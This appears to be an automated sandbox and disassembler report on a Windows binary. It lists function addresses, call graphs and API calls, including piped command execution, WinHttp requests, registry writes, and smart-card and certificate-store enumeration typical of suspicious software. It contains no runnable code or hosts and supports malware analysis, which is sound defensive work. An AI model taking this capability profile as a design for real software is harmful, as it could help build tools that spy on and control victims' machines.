7ff6dfe29895 4143->4144 4145 7ff6dfe21990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4144->4145 4146 7ff6dfe298a4 4145->4146 4147 7ff6dfe29224 15 API calls 4146->4147 4148 7ff6dfe298af 4147->4148 4149 7ff6dfe2e6f0 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4148->4149 4150 7ff6dfe298cd 4149->4150 4151 7ff6dfe2e6f0 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4150->4151 4153 7ff6dfe298ed 4151->4153 4152 7ff6dfe299cf 4155 7ff6dfe21a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4152->4155 4153->4152 4154 7ff6dfe21990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4153->4154 4156 7ff6dfe2993f 4154->4156 4157 7ff6dfe299ef 4155->4157 4158 7ff6dfe29950 4156->4158 4159 7ff6dfe29943 4156->4159 4160 7ff6dfe21990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4157->4160 4163 7ff6dfe279f0 GetProcessHeap HeapAlloc 4158->4163 4161 7ff6dfe219e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4159->4161 4162 7ff6dfe299fe 4160->4162 4164 7ff6dfe2994e 4161->4164 4162->3961 4162->3968 4165 7ff6dfe29958 4163->4165 4167 7ff6dfe21990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4164->4167 4166 7ff6dfe219e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4165->4166 4168 7ff6dfe29966 4166->4168 4169 7ff6dfe2997d 4167->4169 4170 7ff6dfe225b4 GetProcessHeap RtlFreeHeap 4168->4170 4171 7ff6dfe21990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4169->4171 4170->4164 4172 7ff6dfe29991 4171->4172 4173 7ff6dfe29995 4172->4173 4174 7ff6dfe299a2 4172->4174 4175 7ff6dfe219e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4173->4175 4176 7ff6dfe279f0 GetProcessHeap HeapAlloc 4174->4176 4177 7ff6dfe299a0 4175->4177 4178 7ff6dfe299aa 4176->4178 4180 7ff6dfe21990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4177->4180 4179 7ff6dfe219e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4178->4179 4181 7ff6dfe299b8 4179->4181 4180->4152 4182 7ff6dfe225b4 GetProcessHeap RtlFreeHeap 4181->4182 4182->4177 4255 7ff6dfe2971c 4183->4255 4186 7ff6dfe294fc WaitForSingleObject 4188 7ff6dfe2954d 4186->4188 4189 7ff6dfe29512 GetSystemTimeAsFileTime 4186->4189 4187 7ff6dfe2968c 6 API calls 4191 7ff6dfe294cf 4187->4191 4190 7ff6dfe29540 4188->4190 4192 7ff6dfe2968c 6 API calls 4188->4192 4194 7ff6dfe29563 4188->4194 4189->4191 4190->3961 4191->4186 4191->4187 4191->4190 4197 7ff6dfe29534 TerminateProcess 4191->4197 4192->4194 4193 7ff6dfe2957d GetExitCodeProcess 4193->4190 4196 7ff6dfe2958f CloseHandle 4193->4196 4194->4190 4194->4193 4195 7ff6dfe2968c 6 API calls 4194->4195 4198 7ff6dfe29579 4195->4198 4196->4190 4197->4190 4198->4190 4198->4193 4200 7ff6dfe2192e 4199->4200 4202 7ff6dfe21951 4199->4202 4200->4200 4203 7ff6dfe22654 4200->4203 4202->4093 4204 7ff6dfe22669 GetProcessHeap RtlReAllocateHeap 4203->4204 4205 7ff6dfe22682 4203->4205 4206 7ff6dfe2268a 4204->4206 4208 7ff6dfe225dc GetProcessHeap HeapAlloc 4205->4208 4206->4202 4212 7ff6dfe225dc GetProcessHeap HeapAlloc 4209->4212 4211 7ff6dfe2965f 4211->4097 4214 7ff6dfe22561 CreatePipe 4213->4214 4214->4102 4214->4103 4216 7ff6dfe27d0e 4215->4216 4225 7ff6dfe225dc GetProcessHeap HeapAlloc 4216->4225 4218 7ff6dfe27d1d 4218->4118 4220 7ff6dfe225b9 GetProcessHeap RtlFreeHeap 4219->4220 4221 7ff6dfe225da 4219->4221 4220->4221 4221->4120 4223 7ff6dfe21918 4 API calls 4222->4223 4224 7ff6dfe21a96 wvsprintfW 4223->4224 4224->4117 4227 7ff6dfe296ca 4226->4227 4228 7ff6dfe296c2 4226->4228 4227->4130 4228->4227 4233 7ff6dfe2e6f0 4228->4233 4231 7ff6dfe29701 4237 7ff6dfe2e740 4231->4237 4234 7ff6dfe2e70d 4233->4234 4235 7ff6dfe296dc ReadFile 4233->4235 4234->4234 4236 7ff6dfe22654 4 API calls 4234->4236 4235->4227 4235->4231 4236->4235 4238 7ff6dfe2e6f0 4 API calls 4237->4238 4239 7ff6dfe2e755 4238->4239 4239->4227 4241 7ff6dfe27a09 4240->4241 4242 7ff6dfe27a0d 4240->4242 4244 7ff6dfe219e4 4241->4244 4249 7ff6dfe225dc GetProcessHeap HeapAlloc 4242->4249 4250 7ff6dfe27dc8 4244->4250 4251 7ff6dfe27de9 4250->4251 4254 7ff6dfe225dc GetProcessHeap HeapAlloc 4251->4254 4256 7ff6dfe2974b 4255->4256 4258 7ff6dfe294ba GetSystemTimeAsFileTime 4256->4258 4259 7ff6dfe297a4 WriteFile 4256->4259 4258->4191 4260 7ff6dfe297c7 4259->4260 4260->4256 4843 7ff6dfe2250c 4848 7ff6dfe2213c 4843->4848 4846 7ff6dfe2253b 4891 7ff6dfe21c80 4848->4891 4851 7ff6dfe225b4 2 API calls 4852 7ff6dfe2219e 4851->4852 4853 7ff6dfe224e6 4852->4853 4854 7ff6dfe221ba WinHttpCrackUrl 4852->4854 4853->4846 4880 7ff6dfe21eec 4853->4880 4855 7ff6dfe221e6 4854->4855 4856 7ff6dfe224dd WinHttpCloseHandle 4854->4856 4857 7ff6dfe221f7 WinHttpConnect 4855->4857 4856->4853 4857->4856 4858 7ff6dfe22225 4857->4858 4858->4858 4859 7ff6dfe2228b WinHttpOpenRequest 4858->4859 4860 7ff6dfe222ba 4859->4860 4861 7ff6dfe224cd WinHttpCloseHandle 4859->4861 4862 7ff6dfe222c0 WinHttpQueryOption WinHttpSetOption 4860->4862 4863 7ff6dfe22304 WinHttpSendRequest 4860->4863 4861->4856 4862->4863 4864 7ff6dfe2232b WinHttpReceiveResponse 4863->4864 4865 7ff6dfe224c4 WinHttpCloseHandle 4863->4865 4864->4865 4866 7ff6dfe2233e 4864->4866 4865->4861 4867 7ff6dfe2e7e0 2 API calls 4866->4867 4868 7ff6dfe2234d WinHttpQueryDataAvailable 4867->4868 4869 7ff6dfe2e6f0 4 API calls 4868->4869 4870 7ff6dfe2236d WinHttpReadData 4869->4870 4871 7ff6dfe2238b 4870->4871 4871->4868 4872 7ff6dfe2e740 4 API calls 4871->4872 4874 7ff6dfe2239f 4871->4874 4872->4871 4873 7ff6dfe224ba 4873->4865 4874->4873 4895 7ff6dfe27a60 4874->4895 4919 7ff6dfe21de8 4880->4919 4883 7ff6dfe21f5e SysAllocString SafeArrayCreateVector SafeArrayAccessData 4885 7ff6dfe2262c 4883->4885 4884 7ff6dfe22121 4884->4846 4886 7ff6dfe21fa8 SafeArrayUnaccessData 4885->4886 4889 7ff6dfe21fd9 4886->4889 4887 7ff6dfe21ffe SysFreeString 4887->4884 4889->4887 4890 7ff6dfe21cbc 11 API calls 4889->4890 4890->4887 4892 7ff6dfe21ca1 4891->4892 4893 7ff6dfe21ca5 WinHttpOpen 4892->4893 4894 7ff6dfe279f0 2 API calls 4892->4894 4893->4851 4894->4893 4896 7ff6dfe224a5 4895->4896 4897 7ff6dfe27a84 4895->4897 4899 7ff6dfe21cbc 4896->4899 4907 7ff6dfe225dc GetProcessHeap HeapAlloc 4897->4907 4908 7ff6dfe2a534 4899->4908 4909 7ff6dfe2a565 4908->4909 4918 7ff6dfe225dc GetProcessHeap HeapAlloc 4909->4918 4925 7ff6dfe21b74 4919->4925 4921 7ff6dfe21e06 RegCreateKeyExA 4922 7ff6dfe21e3f CoInitializeEx VariantInit CoCreateInstance 4921->4922 4923 7ff6dfe21e46 4921->4923 4922->4883 4922->4884 4923->4923 4924 7ff6dfe21ea2 RegSetValueExA RegCloseKey 4923->4924 4924->4922 4926 7ff6dfe21bc3 4925->4926 4926->4921 4927 7ff6dfe2ecd0 4928 7ff6dfe2ee1b 4927->4928 4929 7ff6dfe2ecfe 4927->4929 4929->4928 4941 7ff6dfe225dc GetProcessHeap HeapAlloc 4929->4941 4942 7ff6dfe2c390 4943 7ff6dfe2c3a3 4942->4943 4944 7ff6dfe21990 4 API calls 4943->4944 4945 7ff6dfe2c3ae 4944->4945 4960 7ff6dfe2c55c 4945->4960 5044 7ff6dfe2e958 4960->5044 5065 7ff6dfe225dc GetProcessHeap HeapAlloc 5044->5065 5153 7ff6dfe214d4 5154 7ff6dfe21507 5153->5154 5155 7ff6dfe214ea 5153->5155 5155->5154 5156 7ff6dfe21501 RemoveVectoredExceptionHandler 5155->5156 5156->5154 5157 7ff6dfe26054 5158 7ff6dfe26077 5157->5158 5158->5158 5159 7ff6dfe27234 5 API calls 5158->5159 5160 7ff6dfe260f1 5159->5160 5161 7ff6dfe27234 5 API calls 5160->5161 5162 7ff6dfe26110 5161->5162 5163 7ff6dfe27234 5 API calls 5162->5163 5164 7ff6dfe2612f 5163->5164 5165 7ff6dfe27234 5 API calls 5164->5165 5166 7ff6dfe2619e 5165->5166 5167 7ff6dfe27234 5 API calls 5166->5167 5168 7ff6dfe261bd 5167->5168 5169 7ff6dfe272d4 5 API calls 5168->5169 5170 7ff6dfe261dc 5169->5170 5171 7ff6dfe26b94 5172 7ff6dfe26bbf 5171->5172 5173 7ff6dfe27234 5 API calls 5172->5173 5174 7ff6dfe26c2e 5173->5174 5175 7ff6dfe27234 5 API calls 5174->5175 5176 7ff6dfe26c9d 5175->5176 5177 7ff6dfe27234 5 API calls 5176->5177 5178 7ff6dfe26d09 5177->5178 5179 7ff6dfe261f8 5180 7ff6dfe2620e 5179->5180 5181 7ff6dfe27234 5 API calls 5180->5181 5182 7ff6dfe2623c 5181->5182 5183 7ff6dfe27234 5 API calls 5182->5183 5184 7ff6dfe2625c 5183->5184 5185 7ff6dfe2b43c 5186 7ff6dfe2b45f 5185->5186 5187 7ff6dfe21990 4 API calls 5186->5187 5188 7ff6dfe2b46a 5187->5188 5189 7ff6dfe21990 4 API calls 5188->5189 5190 7ff6dfe2b479 5189->5190 5191 7ff6dfe2b89d 5190->5191 5192 7ff6dfe2b49a 5190->5192 5193 7ff6dfe21990 4 API calls 5191->5193 5194 7ff6dfe2b74a 5192->5194 5195 7ff6dfe2b4c3 5192->5195 5196 7ff6dfe2b8b1 5193->5196 5197 7ff6dfe21990 4 API calls 5194->5197 5198 7ff6dfe21990 4 API calls 5195->5198 5200 7ff6dfe21990 4 API calls 5196->5200 5199 7ff6dfe2b75a 5197->5199 5237 7ff6dfe2b4d3 5198->5237 5204 7ff6dfe21990 4 API calls 5199->5204 5201 7ff6dfe2b8c5 5200->5201 5202 7ff6dfe21a70 5 API calls 5201->5202 5205 7ff6dfe2b89b 5202->5205 5203 7ff6dfe2b739 5206 7ff6dfe21990 4 API calls 5203->5206 5207 7ff6dfe2b76e 5204->5207 5208 7ff6dfe21990 4 API calls 5205->5208 5211 7ff6dfe2b748 5206->5211 5209 7ff6dfe21a70 5 API calls 5207->5209 5210 7ff6dfe2b8e6 5208->5210 5209->5211 5212 7ff6dfe21990 4 API calls 5211->5212 5213 7ff6dfe2b794 SCardListCardsW 5212->5213 5215 7ff6dfe2b856 5213->5215 5216 7ff6dfe2b7cd 5213->5216 5214 7ff6dfe219e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 5214->5237 5219 7ff6dfe21990 4 API calls 5215->5219 5218 7ff6dfe21990 4 API calls 5216->5218 5217 7ff6dfe21990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 5217->5237 5232 7ff6dfe2b7dd 5218->5232 5220 7ff6dfe2b866 5219->5220 5224 7ff6dfe21990 4 API calls 5220->5224 5221 7ff6dfe2b53f SCardGetStatusChangeW 5221->5237 5222 7ff6dfe2b838 5223 7ff6dfe21990 4 API calls 5222->5223 5225 7ff6dfe2b847 SCardFreeMemory 5223->5225 5227 7ff6dfe2b87a 5224->5227 5228 7ff6dfe2b88c 5225->5228 5226 7ff6dfe21990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 5226->5232 5229 7ff6dfe21a70 5 API calls 5227->5229 5231 7ff6dfe21990 4 API calls 5228->5231 5229->5228 5230 7ff6dfe219e4 4 API calls 5230->5232 5231->5205 5232->5222 5232->5226 5232->5230 5233 7ff6dfe21a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 5233->5237 5234 7ff6dfe2b5d3 SCardListCardsW 5234->5237 5235 7ff6dfe21990 4 API calls 5236 7ff6dfe2b68a SCardFreeMemory 5235->5236 5236->5237 5237->5203 5237->5214 5237->5217 5237->5221 5237->5233 5237->5234 5237->5235 4371 7ff6dfe273fc 4372 7ff6dfe2743f 4371->4372 4373 7ff6dfe21990 4 API calls 4372->4373 4374 7ff6dfe2746e 4373->4374 4375 7ff6dfe21a70 5 API calls 4374->4375 4376 7ff6dfe27490 4375->4376 4377 7ff6dfe21a70 5 API calls 4376->4377 4378 7ff6dfe274a4 4377->4378 4419 7ff6dfe278ec 4378->4419 4381 7ff6dfe21990 4 API calls 4382 7ff6dfe274c5 4381->4382 4383 7ff6dfe21a70 5 API calls 4382->4383 4384 7ff6dfe274d9 4383->4384 4425 7ff6dfe279c4 GetNativeSystemInfo 4384->4425 4387 7ff6dfe21990 4 API calls 4388 7ff6dfe274fa 4387->4388 4427 7ff6dfe27138 CoInitializeEx CoInitializeSecurity CoCreateInstance 4388->4427 4390 7ff6dfe27503 4395 7ff6dfe275d1 4390->4395 4428 7ff6dfe2785c 4390->4428 4391 7ff6dfe2783c 4439 7ff6dfe27104 4391->4439 4395->4391 4396 7ff6dfe2785c 5 API calls 4395->4396 4399 7ff6dfe27629 4396->4399 4397 7ff6dfe2755b 4398 7ff6dfe2785c 5 API calls 4397->4398 4401 7ff6dfe27596 4398->4401 4400 7ff6dfe2785c 5 API calls 4399->4400 4403 7ff6dfe27664 4400->4403 4402 7ff6dfe2785c 5 API calls 4401->4402 4402->4395 4404 7ff6dfe2785c 5 API calls 4403->4404 4405 7ff6dfe2769f 4404->4405 4406 7ff6dfe2785c 5 API calls 4405->4406 4407 7ff6dfe276da 4406->4407 4408 7ff6dfe2785c 5 API calls 4407->4408 4409 7ff6dfe27715 4408->4409 4410 7ff6dfe2785c 5 API calls 4409->4410 4411 7ff6dfe27750 4410->4411 4412 7ff6dfe2785c 5 API calls 4411->4412 4413 7ff6dfe2778b 4412->4413 4414 7ff6dfe2785c 5 API calls 4413->4414 4415 7ff6dfe277c6 4414->4415 4416 7ff6dfe2785c 5 API calls 4415->4416 4417 7ff6dfe27801 4416->4417 4418 7ff6dfe2785c 5 API calls 4417->4418 4418->4391 4420 7ff6dfe27918 4419->4420 4421 7ff6dfe27977 LoadLibraryA GetProcAddress 4420->4421 4422 7ff6dfe274a9 4421->4422 4423 7ff6dfe27991 GetCurrentProcess IsWow64Process 4421->4423 4422->4381 4423->4422 4424 7ff6dfe279ad 4423->4424 4424->4422 4426 7ff6dfe274de 4425->4426 4426->4387 4427->4390 4429 7ff6dfe21990 4 API calls 4428->4429 4430 7ff6dfe27888 4429->4430 4431 7ff6dfe21990 4 API calls 4430->4431 4432 7ff6dfe27893 4431->4432 4433 7ff6dfe21990 4 API calls 4432->4433 4434 7ff6dfe278a2 4433->4434 4442 7ff6dfe27034 4434->4442 4437 7ff6dfe21990 4 API calls 4438 7ff6dfe278d5 4437->4438 4438->4397 4440 7ff6dfe27116 CoUninitialize 4439->4440 4443 7ff6dfe27079 4442->4443 4444 7ff6dfe2707d 4443->4444 4447 7ff6dfe268d4 4443->4447 4457 7ff6dfe26004 4443->4457 4444->4437 4448 7ff6dfe268f7 4447->4448 4448->4448 4461 7ff6dfe27234 4448->4461 4450 7ff6dfe26971 4451 7ff6dfe27234 5 API calls 4450->4451 4452 7ff6dfe26990 4451->4452 4453 7ff6dfe27234 5 API calls 4452->4453 4454 7ff6dfe269af 4453->4454 4470 7ff6dfe272d4 4454->4470 4458 7ff6dfe2601a 4457->4458 4459 7ff6dfe27234 5 API calls 4458->4459 4460 7ff6dfe26042 4459->4460 4475 7ff6dfe27310 4461->4475 4464 7ff6dfe27291 4464->4450 4465 7ff6dfe21990 4 API calls 4466 7ff6dfe27275 4465->4466 4468 7ff6dfe219e4 4 API calls 4466->4468 4467 7ff6dfe21990 4 API calls 4467->4464 4469 7ff6dfe27260 4468->4469 4469->4467 4471 7ff6dfe27310 5 API calls 4470->4471 4472 7ff6dfe272f1 4471->4472 4473 7ff6dfe269ce 4472->4473 4474 7ff6dfe21a70 5 API calls 4472->4474 4474->4473 4476 7ff6dfe2733e 4475->4476 4477 7ff6dfe27362 4476->4477 4479 7ff6dfe27381 4476->4479 4482 7ff6dfe21a70 5 API calls 4477->4482 4478 7ff6dfe273bb 4481 7ff6dfe21990 4 API calls 4478->4481 4479->4478 4480 7ff6dfe27395 4479->4480 4487 7ff6dfe21a70 5 API calls 4480->4487 4483 7ff6dfe273ca 4481->4483 4484 7ff6dfe27251 4482->4484 4485 7ff6dfe21990 4 API calls 4483->4485 4484->4464 4484->4465 4484->4469 4486 7ff6dfe273d5 4485->4486 4488 7ff6dfe21990 4 API calls 4486->4488 4487->4484 4488->4484 5238 7ff6dfe2e3c0 lstrcpyW PathAppendW 5239 7ff6dfe2e437 5238->5239 5240 7ff6dfe2cd0c 6 API calls 5239->5240 5241 7ff6dfe2e477 5240->5241 5242 7ff6dfe2e4ce 5241->5242 5243 7ff6dfe21990 4 API calls 5241->5243 5244 7ff6dfe2e48a 5243->5244 5245 7ff6dfe219e4 4 API calls 5244->5245 5246 7ff6dfe2e495 5245->5246 5247 7ff6dfe21990 4 API calls 5246->5247 5248 7ff6dfe2e4a4 5247->5248 5249 7ff6dfe219e4 4 API calls 5248->5249 5250 7ff6dfe2e4b3 5249->5250 5251 7ff6dfe21990 4 API calls 5250->5251 5252 7ff6dfe2e4c2 5251->5252 5253 7ff6dfe225b4 2 API calls 5252->5253 5253->5242 4489 7ff6dfe231c4 4490 7ff6dfe231d7 4489->4490 4491 7ff6dfe21990 4 API calls 4490->4491 4492 7ff6dfe231e2 4491->4492 4493 7ff6dfe21990 4 API calls 4492->4493 4494 7ff6dfe231f1 CertEnumSystemStoreLocation 4493->4494 4495 7ff6dfe21990 4 API calls 4494->4495 4496 7ff6dfe23215 4495->4496

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 129 7ff6dfe29224-7ff6dfe29306 GetSystemTimeAsFileTime call 7ff6dfe29a20 * 3 call 7ff6dfe29a98 call 7ff6dfe22698 call 7ff6dfe225dc call 7ff6dfe27b34 * 4 call 7ff6dfe2971c call 7ff6dfe225b4 154 7ff6dfe29309-7ff6dfe29317 129->154 155 7ff6dfe29329-7ff6dfe29330 154->155 156 7ff6dfe29319-7ff6dfe2931c call 7ff6dfe2968c 154->156 158 7ff6dfe2938c-7ff6dfe29393 155->158 159 7ff6dfe29332-7ff6dfe29335 155->159 162 7ff6dfe29321-7ff6dfe29323 156->162 160 7ff6dfe29395-7ff6dfe29399 call 7ff6dfe2968c 158->160 161 7ff6dfe293a2-7ff6dfe293b6 WaitForSingleObject 158->161 159->158 163 7ff6dfe29337-7ff6dfe29351 159->163 172 7ff6dfe2939e-7ff6dfe293a0 160->172 167 7ff6dfe293b8-7ff6dfe293ca GetSystemTimeAsFileTime 161->167 168 7ff6dfe293f5 161->168 162->155 162->168 164 7ff6dfe29382-7ff6dfe29386 163->164 165 7ff6dfe29353-7ff6dfe29365 call 7ff6dfe27b50 163->165 164->158 171 7ff6dfe29418-7ff6dfe2942c WaitForSingleObject 164->171 177 7ff6dfe29367-7ff6dfe2936e 165->177 178 7ff6dfe29374-7ff6dfe29380 165->178 167->154 173 7ff6dfe293d0-7ff6dfe293e3 call 7ff6dfe29a98 167->173 170 7ff6dfe293f7-7ff6dfe29417 168->170 171->168 175 7ff6dfe2942e-7ff6dfe29434 171->175 172->161 172->168 173->154 185 7ff6dfe293e9-7ff6dfe293ef TerminateProcess 173->185 179 7ff6dfe29436-7ff6dfe29439 call 7ff6dfe2968c 175->179 180 7ff6dfe29442-7ff6dfe29449 175->180 177->171 177->178 178->164 178->165 186 7ff6dfe2943e-7ff6dfe29440 179->186 183 7ff6dfe29458-7ff6dfe29468 GetExitCodeProcess 180->183 184 7ff6dfe2944b-7ff6dfe2944f call 7ff6dfe2968c 180->184 188 7ff6dfe2946a-7ff6dfe29471 183->188 189 7ff6dfe29473-7ff6dfe29475 183->189 190 7ff6dfe29454-7ff6dfe29456 184->190 185->168 186->168 186->180 188->168 188->189 189->170 190->168 190->183
                                                                                            APIs
                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6DFE2924D
                                                                                              • Part of subcall function 00007FF6DFE225DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6DFE21985,?,?,?,00007FF6DFE2155F), ref: 00007FF6DFE225E5
                                                                                              • Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
                                                                                              • Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF
                                                                                            • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6DFE293AB
                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6DFE293C0
                                                                                            • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6DFE293EF
                                                                                              • Part of subcall function 00007FF6DFE2968C: PeekNamedPipe.KERNELBASE ref: 00007FF6DFE296B8
                                                                                            • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6DFE29421
                                                                                            • GetExitCodeProcess.KERNELBASE ref: 00007FF6DFE29460
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
                                                                                            • String ID: & echo
                                                                                            • API String ID: 2711250446-3491486023
                                                                                            • Opcode ID: e1a57332913e15c3beaf25be37e5f59387cb859b354fc8ccef40118164e5a1d9
                                                                                            • Instruction ID: 2b15553715e696942b8edd41ca926d65e258bb26c4d321d50eb2fac753213681
                                                                                            • Opcode Fuzzy Hash: e1a57332913e15c3beaf25be37e5f59387cb859b354fc8ccef40118164e5a1d9
                                                                                            • Instruction Fuzzy Hash: 4C513B21A09643A1EE30DB62E4952BE6391FFC5B84F446037CE4EC7A95EE7EE455D300

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize$CreateInstanceSecurity
                                                                                            • String ID:
                                                                                            • API String ID: 89549506-0
                                                                                            • Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                                            • Instruction ID: 889bbb170be49696077d6ff5e82fda32f361787300a8133618924174d1b608d2
                                                                                            • Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                                            • Instruction Fuzzy Hash: F0118873A28640DAF3108F61E8593AE7774F38870DF608219EA496A998CF3CD255CB84

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 371 7ff6dfe29ac8-7ff6dfe29b3d call 7ff6dfe28800 call 7ff6dfe21990 call 7ff6dfe29644 call 7ff6dfe226b0 380 7ff6dfe29b41-7ff6dfe29b53 371->380 380->380 381 7ff6dfe29b55-7ff6dfe29b66 call 7ff6dfe2900c 380->381 384 7ff6dfe29b6c-7ff6dfe29b7e call 7ff6dfe295a0 381->384 385 7ff6dfe2a4fb-7ff6dfe2a533 call 7ff6dfe29624 call 7ff6dfe21990 381->385 384->385 391 7ff6dfe29b84-7ff6dfe29b9e call 7ff6dfe28258 call 7ff6dfe297dc 384->391 391->385 397 7ff6dfe29ba4-7ff6dfe29bd0 call 7ff6dfe21990 call 7ff6dfe28938 call 7ff6dfe297dc 391->397 397->385 404 7ff6dfe29bd6-7ff6dfe29bfb call 7ff6dfe21990 call 7ff6dfe27fd4 call 7ff6dfe297dc 397->404 404->385 411 7ff6dfe29c01-7ff6dfe29c26 call 7ff6dfe21990 call 7ff6dfe28bc0 call 7ff6dfe297dc 404->411 411->385 418 7ff6dfe29c2c-7ff6dfe29c51 call 7ff6dfe21990 call 7ff6dfe27f4c call 7ff6dfe297dc 411->418 418->385 425 7ff6dfe29c57-7ff6dfe29c7c call 7ff6dfe21990 call 7ff6dfe2839c call 7ff6dfe297dc 418->425 425->385 432 7ff6dfe29c82-7ff6dfe29ca7 call 7ff6dfe21990 call 7ff6dfe28d80 call 7ff6dfe297dc 425->432 432->385 439 7ff6dfe29cad-7ff6dfe29cd2 call 7ff6dfe21990 call 7ff6dfe28e14 call 7ff6dfe297dc 432->439 439->385 446 7ff6dfe29cd8-7ff6dfe29cfd call 7ff6dfe21990 call 7ff6dfe28a88 call 7ff6dfe297dc 439->446 446->385 453 7ff6dfe29d03-7ff6dfe29d28 call 7ff6dfe21990 call 7ff6dfe289d8 call 7ff6dfe297dc 446->453 453->385 460 7ff6dfe29d2e-7ff6dfe29d53 call 7ff6dfe21990 call 7ff6dfe28510 call 7ff6dfe297dc 453->460 460->385 467 7ff6dfe29d59-7ff6dfe29d7e call 7ff6dfe21990 call 7ff6dfe281c4 call 7ff6dfe297dc 460->467 467->385 474 7ff6dfe29d84-7ff6dfe29da9 call 7ff6dfe21990 call 7ff6dfe28114 call 7ff6dfe297dc 467->474 474->385 481 7ff6dfe29daf-7ff6dfe29dd4 call 7ff6dfe21990 call 7ff6dfe285c0 call 7ff6dfe297dc 474->481 481->385 488 7ff6dfe29dda-7ff6dfe29e21 call 7ff6dfe21990 call 7ff6dfe226b0 481->488 493 7ff6dfe29e24-7ff6dfe29e34 488->493 493->493 494 7ff6dfe29e36-7ff6dfe29e47 call 7ff6dfe297dc 493->494 494->385 497 7ff6dfe29e4d-7ff6dfe29e90 call 7ff6dfe21990 call 7ff6dfe226b0 494->497 502 7ff6dfe29e93-7ff6dfe29ea3 497->502 502->502 503 7ff6dfe29ea5-7ff6dfe29eb6 call 7ff6dfe297dc 502->503 503->385 506 7ff6dfe29ebc-7ff6dfe29f09 call 7ff6dfe21990 call 7ff6dfe226b0 503->506 511 7ff6dfe29f0d-7ff6dfe29f1c 506->511 511->511 512 7ff6dfe29f1e-7ff6dfe29f2f call 7ff6dfe297dc 511->512 512->385 515 7ff6dfe29f35-7ff6dfe29f74 call 7ff6dfe21990 call 7ff6dfe226b0 512->515 520 7ff6dfe29f77-7ff6dfe29f86 515->520 520->520 521 7ff6dfe29f88-7ff6dfe29f99 call 7ff6dfe297dc 520->521 521->385 524 7ff6dfe29f9f-7ff6dfe29fe0 call 7ff6dfe21990 call 7ff6dfe226b0 521->524 529 7ff6dfe29fe6-7ff6dfe29ff5 524->529 529->529 530 7ff6dfe29ff7-7ff6dfe2a001 call 7ff6dfe297dc 529->530 532 7ff6dfe2a006-7ff6dfe2a008 530->532 532->385 533 7ff6dfe2a00e-7ff6dfe2a053 call 7ff6dfe21990 call 7ff6dfe226b0 532->533 538 7ff6dfe2a059-7ff6dfe2a068 533->538 538->538 539 7ff6dfe2a06a-7ff6dfe2a07b call 7ff6dfe297dc 538->539 539->385 542 